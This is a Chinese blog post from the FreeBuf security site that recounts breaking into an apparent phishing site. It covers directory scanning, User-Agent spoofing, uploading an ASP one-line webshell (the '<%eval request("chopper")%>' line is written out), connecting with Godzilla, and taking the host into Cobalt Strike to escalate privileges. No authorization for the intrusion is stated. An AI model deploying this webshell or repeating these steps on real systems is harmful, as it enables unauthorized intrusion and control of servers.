freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

[实战渗透]记某钓鱼网站渗透
keyoldk 2022-12-17 21:22:33 209741
所属地 香港

记某钓鱼网站渗透

一、信息合搜集

scandir信息收集

我们利用scandir 对钓鱼网站进行扫描

发现一个文件上传的入口,我们可以利用他进行上传webshell

1671282934_639dc0f63f44ff0709813.png!small?1671282934330


二、哥斯拉webshell

绕UA信息

访问这个网站,发现这个小可爱骗骗还搞个个电脑访问

1671282956_639dc10c85b2024eec813.png!small?1671282956609

1671282972_639dc11c3197c1fd2137f.png!small?1671282972502

利用谷歌自带的工具 修改UA信息

1671282965_639dc115173c881cb5d9d.png!small?1671282965195

可以看到这个是非常一个经典的钓鱼网站,一般人们通过填写个人信息,银行卡钱就无了。

1671282989_639dc12d5102ba48dc172.png!small?1671282989733

1671282995_639dc133b741746a2dd09.png!small?1671282995910

三、文件上传webshell

编写一句话asp

一句话asp地址

访问我们刚刚发现的 sn.asp ,显而易见这个是一个java写的,我尝试写一个asp马

<%eval request("chopper")%>

文件上传

重命名文件为 asp 后缀文件,然后,上传。

之后访问IP/xx.asp文件

哥斯拉

利用我们的哥斯拉进行连接

1671283020_639dc14c4354154475e7e.png!small?1671283020321

1671283035_639dc15b22fb76094d3bd.png!small?1671283035136

四、CS上线

1671283043_639dc1638778d8c004fae.png!small?1671283043848

哥斯拉那边运行一下

1671283048_639dc1683e49358fc454e.png!small?1671283048226

之后就可以像我这样上线提权了

1671283058_639dc17249aedd98e56ab.png!small?1671283058301

# 漏洞 # 渗透测试 # 网络安全 # 灰产圈
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 keyoldk 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
keyoldk LV.1
这家伙太懒了,还未填写个人描述!
  • 1 文章数
  • 0 关注者
文章目录